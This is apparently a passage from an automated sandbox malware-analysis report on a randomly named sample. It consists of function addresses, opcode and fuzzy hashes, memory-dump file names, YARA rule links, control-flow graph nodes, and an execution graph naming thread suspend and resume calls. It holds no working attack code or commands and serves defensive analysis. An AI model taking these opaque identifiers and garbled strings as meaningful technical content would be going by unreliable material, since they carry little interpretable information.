                                                    • Instruction ID: 368d41c9d8ba672dbdbe60886c097b436a632f96f14cf7e58b3e1a1d1982bf09
                                                    • Opcode Fuzzy Hash: e04186bcfd4331f98c1ec81794a63995ea26cdf0b2890372336e89750d9780ed
                                                    • Instruction Fuzzy Hash: 7401D471959A954FDB19AB7994119EAB7E0EF55300B4046BAD48FC74D3CD28F40D83C0
                                                    Function 00007FFAAC5BAFCD Relevance: .0, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1468281331.00007FFAAC5B5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B5000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaac5b5000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 34a34d899681d2d41189e2a3fc1718b259617440c40c1b1a803ba397d228660c
                                                    • Instruction ID: 83dc0006a5a753cb05f86a00459eefe32c48ec8045d8017b1396f9958aa3c3fe
                                                    • Opcode Fuzzy Hash: 34a34d899681d2d41189e2a3fc1718b259617440c40c1b1a803ba397d228660c
                                                    • Instruction Fuzzy Hash: F8019E75C4A64EDFEB50EF6884496B97FA4EF55300F4441FAE40DC7452EA34E6988780
                                                    Function 00007FFAACCE3279 Relevance: .0, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 794a41ab53eefce973e64ad4f88a4a07bfae810bb81aef0d33044f912ee3cfe1
                                                    • Instruction ID: f1e422b8374e1d2a47d629ce1ef41dd79d8d3a9601cb598400469f05c8497b84
                                                    • Opcode Fuzzy Hash: 794a41ab53eefce973e64ad4f88a4a07bfae810bb81aef0d33044f912ee3cfe1
                                                    • Instruction Fuzzy Hash: 7A01717080868D8FDB85DF18C495AA97FB0FF66301F0940DAD408C71A2DB359955CB80
                                                    Function 00007FFAACCE042A Relevance: .0, Instructions: 42COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d8a6ccfe6508b397ead5896d87e24add40ba00598f65e541c9d82c87afe47900
                                                    • Instruction ID: d19d881b4c939fd122a174c8bf312da0e63bb1495b5b41e5ba7e8ffee308fbdd
                                                    • Opcode Fuzzy Hash: d8a6ccfe6508b397ead5896d87e24add40ba00598f65e541c9d82c87afe47900
                                                    • Instruction Fuzzy Hash: B701847190844DDFDF54EB64C465FF87BB0EF1A300F1800AC804ED3692CE289946CB50
                                                    Function 00007FFAACCE355D Relevance: .0, Instructions: 39COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: af0a475532214e457358f9382cbd367406674661fc2b7af4bd29a0f5df1a07d6
                                                    • Instruction ID: bfbd4304307c019061052e1b32130a2ed76b9012c9dda2abb9da304c334527a6
                                                    • Opcode Fuzzy Hash: af0a475532214e457358f9382cbd367406674661fc2b7af4bd29a0f5df1a07d6
                                                    • Instruction Fuzzy Hash: 1C014F7180968DCBEB52EF6884525E97BA0FF56300F4881A6E40C86192DA29E964C781
                                                    Function 00007FFAACCDDA0C Relevance: .0, Instructions: 38COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 55ea75d5fe55bd4418b7a22c56786ac6cebde619ba360927198c58bc6581faa3
                                                    • Instruction ID: fd646f75d920fa3b7ced021be15baeccbef89289e1de9998dac0ebde23854427
                                                    • Opcode Fuzzy Hash: 55ea75d5fe55bd4418b7a22c56786ac6cebde619ba360927198c58bc6581faa3
                                                    • Instruction Fuzzy Hash: 09016070D09A2C8FDF98DF18D894BA8B7B1FB69300F10819AD04EE7290CB719A84CF14
                                                    Function 00007FFAAC5806AD Relevance: .0, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1468281331.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaac580000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: df1882a33cefac273b04e3598a926fa8b7129caa4e73b41a5f3eb1a07839540a
                                                    • Instruction ID: 763d7c21102e562bb820f96e422b3650f39d29cd67c8216536c7dd601fd8b3d5
                                                    • Opcode Fuzzy Hash: df1882a33cefac273b04e3598a926fa8b7129caa4e73b41a5f3eb1a07839540a
                                                    • Instruction Fuzzy Hash: 71F01D7495664E9EEB80EF68D4496FE77E4FF95314F108476F41CC2150DA34A2948780
                                                    Function 00007FFAAC581398 Relevance: .0, Instructions: 33COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1468281331.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaac580000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 93efae10e596223d8b9c839e9dbb96e3c1591069497ef9aaf5dbda4fc930d35b
                                                    • Instruction ID: b99d282539c56dc3954fab71ce781219fc455efd124a3798d99cf5799ff6139e
                                                    • Opcode Fuzzy Hash: 93efae10e596223d8b9c839e9dbb96e3c1591069497ef9aaf5dbda4fc930d35b
                                                    • Instruction Fuzzy Hash: 87F0A97091494D9FDF84EF68D448AAA7BF4FF28301F1045A5F81DC7260DA34E594CB81
                                                    Function 00007FFAAC5806D0 Relevance: .0, Instructions: 30COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1468281331.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaac580000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b37ebabd7400ff6f9c40fda43bbd797e9111936cfb962aeb7cfb22f667f28bfe
                                                    • Instruction ID: 6c5c680e0948b8cb26f16ff32c1860c5e1043e4014a152ce72b40189d32b2636
                                                    • Opcode Fuzzy Hash: b37ebabd7400ff6f9c40fda43bbd797e9111936cfb962aeb7cfb22f667f28bfe
                                                    • Instruction Fuzzy Hash: 39F0F87485594E9FEB84EF68C8496EA7BE4FF58304F0084A6F81CD2150DA34A6A48B80
                                                    Function 00007FFAACCE17DA Relevance: .0, Instructions: 30COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ebed16dc99235e07ee0f66d91f479f86b6b21b7f26dbdfaf789ec7cefaa07ec5
                                                    • Instruction ID: 0b662e9997b2bd0b96744e7673d2659fb40f4c5615d60eb52699841c129dc900
                                                    • Opcode Fuzzy Hash: ebed16dc99235e07ee0f66d91f479f86b6b21b7f26dbdfaf789ec7cefaa07ec5
                                                    • Instruction Fuzzy Hash: BBE01222B1DE2C0F5698E66C78162F8A3C1E78963170043BFD44ED3795DD1A5C4242C5
                                                    Function 00007FFAACCDFD66 Relevance: .0, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c675346f652f0deabe126f517fe7bb52c44940d7daed05705e08d61ec19cc6e5
                                                    • Instruction ID: 0d9f665dc5ac2241008638915f8d8575cdcd969f9be61ae90bee313a8341da91
                                                    • Opcode Fuzzy Hash: c675346f652f0deabe126f517fe7bb52c44940d7daed05705e08d61ec19cc6e5
                                                    • Instruction Fuzzy Hash: F6F03A3090992D8FDFA9DF08C890BA9B7B1FB69300F1041DA800EE7290CB31AA94CF50
                                                    Function 00007FFAACCE80EB Relevance: .0, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ed08a8d497b163867ebcbd2870e2016a2b7146a02d28134382e31ad972356950
                                                    • Instruction ID: 815307b19ac72de7a0c2b85967ef2c54e468f0ff2e597d3ec86caa0568963208
                                                    • Opcode Fuzzy Hash: ed08a8d497b163867ebcbd2870e2016a2b7146a02d28134382e31ad972356950
                                                    • Instruction Fuzzy Hash: 23F03A30E4450ACFEB84DF58C885ABE77F1EB56310F10453AC409D3290DB38AA858B80
                                                    Function 00007FFAAC585A29 Relevance: .0, Instructions: 25COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1468281331.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaac580000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d47bd54d451aa5c4ffbd446737ba5e1407740217987ede5d92bd13cd15a82e43
                                                    • Instruction ID: ae86c59291e2cee9b23569ae27b76075a7d04bee6fb9be1eef95dab928f75c3f
                                                    • Opcode Fuzzy Hash: d47bd54d451aa5c4ffbd446737ba5e1407740217987ede5d92bd13cd15a82e43
                                                    • Instruction Fuzzy Hash: 2CF0FE70D4922BCAFB64AB14D8447BDB7B4FF55304F5090B8E14EA32C1DA789A88DF45
                                                    Function 00007FFAAC58AE81 Relevance: .0, Instructions: 25COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1468281331.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaac580000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ffcd3321de3759b7345e89cbfca6f07ab1b6b35fccb07aee80f1e0b206fffc6a
                                                    • Instruction ID: 56a2909239e8e70ad0e90ed31840124a8193b60e024621dec7201fa318e6a33a
                                                    • Opcode Fuzzy Hash: ffcd3321de3759b7345e89cbfca6f07ab1b6b35fccb07aee80f1e0b206fffc6a
                                                    • Instruction Fuzzy Hash: B7F05E60D0651A8EF7B4DB18C855BBD77B1EF84240F1081F5D00DE6696CE346E869F80
                                                    Function 00007FFAACCE08FC Relevance: .0, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 16b534273e53b1bf534127624209fb8fce0cb814d38da2b827deb56d5dc2562a
                                                    • Instruction ID: f5c63bcf7d7226ed5de9dad1b96d33c2c1653a602e283e1a80d3ca6fea93904c
                                                    • Opcode Fuzzy Hash: 16b534273e53b1bf534127624209fb8fce0cb814d38da2b827deb56d5dc2562a
                                                    • Instruction Fuzzy Hash: E4E0C97190895D9FEFA5DF14C890EA8BBB0EF26300F2444D9C04ED7292CA31A985DF41
                                                    Function 00007FFAACCE17B8 Relevance: .0, Instructions: 17COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f74f0cfc307b76a2bf9b3134169fbc1d5e3e2885dd9b977e3823b2c5074691c8
                                                    • Instruction ID: 2f5f059d694ddcbef01ddc31e3366be53de9d85d667770f9a2b3ba739c8d1460
                                                    • Opcode Fuzzy Hash: f74f0cfc307b76a2bf9b3134169fbc1d5e3e2885dd9b977e3823b2c5074691c8
                                                    • Instruction Fuzzy Hash: C7D0C711B1990B46BD985A99046657912C1EB57681B404078940EC3186DD1CDC5501C0
                                                    Function 00007FFAACCE0059 Relevance: .0, Instructions: 15COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c8daa206dd006a2abb262f56e4aa2217bf7fd07e38f966d5c5c2519e653bf8d0
                                                    • Instruction ID: 581689b87117c0efd885ad39abc01e0fd0a60c2851e31d46dbbd0d97bf32218a
                                                    • Opcode Fuzzy Hash: c8daa206dd006a2abb262f56e4aa2217bf7fd07e38f966d5c5c2519e653bf8d0
                                                    • Instruction Fuzzy Hash: 0EE06734E19A3D8FEBA4EF18C8417A9B3B1FB5A310F5044E6904DE3245CA30AE85CF81
                                                    Function 00007FFAACCD0BBB Relevance: .0, Instructions: 11COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6cc9f1cd73963b8e64c53a00d36f63db7e9bf6bb4ce46b5312eed3194358af05
                                                    • Instruction ID: a4b12be4f15305e2d437d0a075d8db3c49fee5b4a1272d6162cd850c870ce9ff
                                                    • Opcode Fuzzy Hash: 6cc9f1cd73963b8e64c53a00d36f63db7e9bf6bb4ce46b5312eed3194358af05
                                                    • Instruction Fuzzy Hash: 2ED09210A0F647E9F26A5F19402033AA1A09F02304F20C4BBC09F618C1891CF429A291
                                                    Function 00007FFAACCD00DF Relevance: .0, Instructions: 8COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 587af31ea369e36e3a95fe935c59aa69601c884c85df8785aa3ba9a88f9d6e6d
                                                    • Instruction ID: 69cc033a3fb99c781ac556a78b7baa6970dce18874c00296f9248583da81da54
                                                    • Opcode Fuzzy Hash: 587af31ea369e36e3a95fe935c59aa69601c884c85df8785aa3ba9a88f9d6e6d
                                                    • Instruction Fuzzy Hash: CBC04C10E4F243EBF6125BE9485123C7BD01F07644B5486B3D50E9A1C3D858B85863A1
                                                    Function 00007FFAAC5836C4 Relevance: .0, Instructions: 3COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1468281331.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaac580000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a9d92f76bb487c63074e397aa12bbe5f08c65161d12f7db3294501c60ec5e727
                                                    • Instruction ID: b25fcd459ace6cc8abd23b8c32145141e5c9723264287493561d8bbe3e5e2d81
                                                    • Opcode Fuzzy Hash: a9d92f76bb487c63074e397aa12bbe5f08c65161d12f7db3294501c60ec5e727
                                                    • Instruction Fuzzy Hash: BDA01220CCA003C1F620171040087BC11945F02340F004078A00C54181CD3852082B81

                                                    Non-executed Functions

                                                    Function 00007FFAAC5809B0 Relevance: 5.2, Strings: 4, Instructions: 186COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1468281331.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaac580000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: c9$!k9$"s9$#{9
                                                    • API String ID: 0-1692736845
                                                    • Opcode ID: b583bb5074a48c7465110b897d61a84d345ae3c071b2323b29694dfda379b1fc
                                                    • Instruction ID: 81d92bf14b40a40145100d8af537cd2651b39c5a0445196a0b5e3f81d832dac0
                                                    • Opcode Fuzzy Hash: b583bb5074a48c7465110b897d61a84d345ae3c071b2323b29694dfda379b1fc
                                                    • Instruction Fuzzy Hash: FA51A5A7A4D0635AF10137FDB4629FD5B88CF89339B08C677E04DC96E3AD28608583E5

                                                    Execution Graph

                                                    Execution Coverage:5.1%
                                                    Dynamic/Decrypted Code Coverage:75%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:12
                                                    Total number of Limit Nodes:0
                                                    execution_graph 21514 7ffaac760040 21515 7ffaac76007b ResumeThread 21514->21515 21517 7ffaac760154 21515->21517 21518 7ffaac75e84d 21519 7ffaac75e85b SuspendThread 21518->21519 21521 7ffaac75e934 21519->21521 21522 7ffaac7601a9 21523 7ffaac7601b7 CloseHandle 21522->21523 21525 7ffaac760294 21523->21525 21526 7ffaac761e35 21527 7ffaac761e82 GetFileAttributesW 21526->21527 21529 7ffaac761f15 21527->21529

                                                    Executed Functions

                                                    Function 00007FFAACD0AFA2 Relevance: 3.2, Strings: 2, Instructions: 679COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 52 7ffaacd0afa2-7ffaacd0afaf 53 7ffaacd0afba-7ffaacd0b0b9 52->53 54 7ffaacd0afb1-7ffaacd0afb9 52->54 58 7ffaacd0b0bf-7ffaacd0b0db 53->58 59 7ffaacd0b157-7ffaacd0b16b 53->59 54->53 58->59 63 7ffaacd0b0dd-7ffaacd0b0f2 58->63 60 7ffaacd0b171-7ffaacd0b1b9 59->60 64 7ffaacd0b1bf-7ffaacd0b1db 60->64 65 7ffaacd0b257-7ffaacd0b26b 60->65 68 7ffaacd0b12b-7ffaacd0b155 63->68 69 7ffaacd0b0f4-7ffaacd0b106 63->69 64->65 74 7ffaacd0b1dd-7ffaacd0b1f2 64->74 67 7ffaacd0b271-7ffaacd0b2c6 65->67 76 7ffaacd0b35b-7ffaacd0b369 67->76 77 7ffaacd0b2cc-7ffaacd0b2e5 67->77 68->60 71 7ffaacd0b10a-7ffaacd0b11d 69->71 72 7ffaacd0b108 69->72 71->71 75 7ffaacd0b11f-7ffaacd0b127 71->75 72->71 80 7ffaacd0b22b-7ffaacd0b255 74->80 81 7ffaacd0b1f4-7ffaacd0b206 74->81 75->68 78 7ffaacd0b36f-7ffaacd0b3c3 76->78 77->76 86 7ffaacd0b2e7-7ffaacd0b2f9 77->86 88 7ffaacd0b458-7ffaacd0b466 78->88 89 7ffaacd0b3c9-7ffaacd0b3e2 78->89 80->67 83 7ffaacd0b20a-7ffaacd0b21d 81->83 84 7ffaacd0b208 81->84 83->83 87 7ffaacd0b21f-7ffaacd0b227 83->87 84->83 93 7ffaacd0b2fb-7ffaacd0b30d 86->93 94 7ffaacd0b332-7ffaacd0b359 86->94 87->80 90 7ffaacd0b46c-7ffaacd0b49c 88->90 89->88 98 7ffaacd0b3e4-7ffaacd0b3f6 89->98 101 7ffaacd0b4fc-7ffaacd0b5c4 90->101 102 7ffaacd0b49e-7ffaacd0b4f3 90->102 95 7ffaacd0b30f 93->95 96 7ffaacd0b311-7ffaacd0b324 93->96 94->78 95->96 96->96 99 7ffaacd0b326-7ffaacd0b32e 96->99 104 7ffaacd0b42f-7ffaacd0b456 98->104 105 7ffaacd0b3f8-7ffaacd0b40a 98->105 99->94 111 7ffaacd0b5cc-7ffaacd0b5de 101->111 102->101 104->90 108 7ffaacd0b40c 105->108 109 7ffaacd0b40e-7ffaacd0b421 105->109 108->109 109->109 110 7ffaacd0b423-7ffaacd0b42b 109->110 110->104 113 7ffaacd0b5e0 111->113 114 7ffaacd0b5e6-7ffaacd0b633 111->114 113->114 117 7ffaacd0b693-7ffaacd0b6d2 114->117 118 7ffaacd0b635-7ffaacd0b690 call 7ffaacd0b6ee 114->118 120 7ffaacd0b6d4 117->120 121 7ffaacd0b6d9-7ffaacd0b6ed 117->121 118->117 120->121
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: )rem$)rem
                                                    • API String ID: 0-3729628724
                                                    • Opcode ID: 16642e69d20209a9dbd383d662c44c954c01f976f5f046cb578194d37ee5a21c
                                                    • Instruction ID: 97ae38141d95466c6a68ab3112988a33bb6a4c245af0efbe47eca5650254af4a
                                                    • Opcode Fuzzy Hash: 16642e69d20209a9dbd383d662c44c954c01f976f5f046cb578194d37ee5a21c
                                                    • Instruction Fuzzy Hash: E9323C70919A8D9FEBB8EF28C855BE937E1FB59301F00412ED85ECB291DB749644CB81
                                                    Function 00007FFAACD09B8B Relevance: 3.2, Strings: 2, Instructions: 675COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 127 7ffaacd09b8b-7ffaacd09c59 131 7ffaacd09c5f-7ffaacd09c7b 127->131 132 7ffaacd09cf7-7ffaacd09d0b 127->132 131->132 136 7ffaacd09c7d-7ffaacd09c92 131->136 133 7ffaacd09d11-7ffaacd09d59 132->133 137 7ffaacd09d5f-7ffaacd09d7b 133->137 138 7ffaacd09df4-7ffaacd09e05 133->138 142 7ffaacd09ccb-7ffaacd09cf5 136->142 143 7ffaacd09c94-7ffaacd09ca6 136->143 137->138 145 7ffaacd09d7d-7ffaacd09d92 137->145 139 7ffaacd09e0b-7ffaacd09f4b 138->139 161 7ffaacd09fe0-7ffaacd09fee 139->161 162 7ffaacd09f51-7ffaacd09f6a 139->162 142->133 146 7ffaacd09caa-7ffaacd09cbd 143->146 147 7ffaacd09ca8 143->147 152 7ffaacd09dcb-7ffaacd09df2 145->152 153 7ffaacd09d94-7ffaacd09da6 145->153 146->146 149 7ffaacd09cbf-7ffaacd09cc7 146->149 147->146 149->142 152->139 154 7ffaacd09daa-7ffaacd09dbd 153->154 155 7ffaacd09da8 153->155 154->154 157 7ffaacd09dbf-7ffaacd09dc7 154->157 155->154 157->152 163 7ffaacd09ff4-7ffaacd0a046 161->163 162->161 165 7ffaacd09f6c-7ffaacd09f7e 162->165 167 7ffaacd0a0db-7ffaacd0a0e9 163->167 168 7ffaacd0a04c-7ffaacd0a065 163->168 171 7ffaacd09f80-7ffaacd09f92 165->171 172 7ffaacd09fb7-7ffaacd09fde 165->172 170 7ffaacd0a0ef-7ffaacd0a1bf 167->170 168->167 177 7ffaacd0a067-7ffaacd0a079 168->177 185 7ffaacd0a1c7-7ffaacd0a1d9 170->185 174 7ffaacd09f94 171->174 175 7ffaacd09f96-7ffaacd09fa9 171->175 172->163 174->175 175->175 178 7ffaacd09fab-7ffaacd09fb3 175->178 181 7ffaacd0a07b-7ffaacd0a08d 177->181 182 7ffaacd0a0b2-7ffaacd0a0d9 177->182 178->172 183 7ffaacd0a08f 181->183 184 7ffaacd0a091-7ffaacd0a0a4 181->184 182->170 183->184 184->184 186 7ffaacd0a0a6-7ffaacd0a0ae 184->186 187 7ffaacd0a1db 185->187 188 7ffaacd0a1e1-7ffaacd0a2cf call 7ffaacd0a2eb 185->188 186->182 187->188 198 7ffaacd0a2d1 188->198 199 7ffaacd0a2d6-7ffaacd0a2ea 188->199 198->199
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: )rem$)rem
                                                    • API String ID: 0-3729628724
                                                    • Opcode ID: 4313f8de533a8e710f9547656279866bc2440a398a03f5b66a4bbe15d6179852
                                                    • Instruction ID: 6f92912cacb57041a0fc676d1dc80cbd69b5a3463f5e9d1f2143924ee4c864e6
                                                    • Opcode Fuzzy Hash: 4313f8de533a8e710f9547656279866bc2440a398a03f5b66a4bbe15d6179852
                                                    • Instruction Fuzzy Hash: EE322E70919A8D8FEBB8EF28C855BE937E1FB59301F00412AD84ED7691DF749A84CB41
                                                    Function 00007FFAACD0194F Relevance: 1.9, Strings: 1, Instructions: 695COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
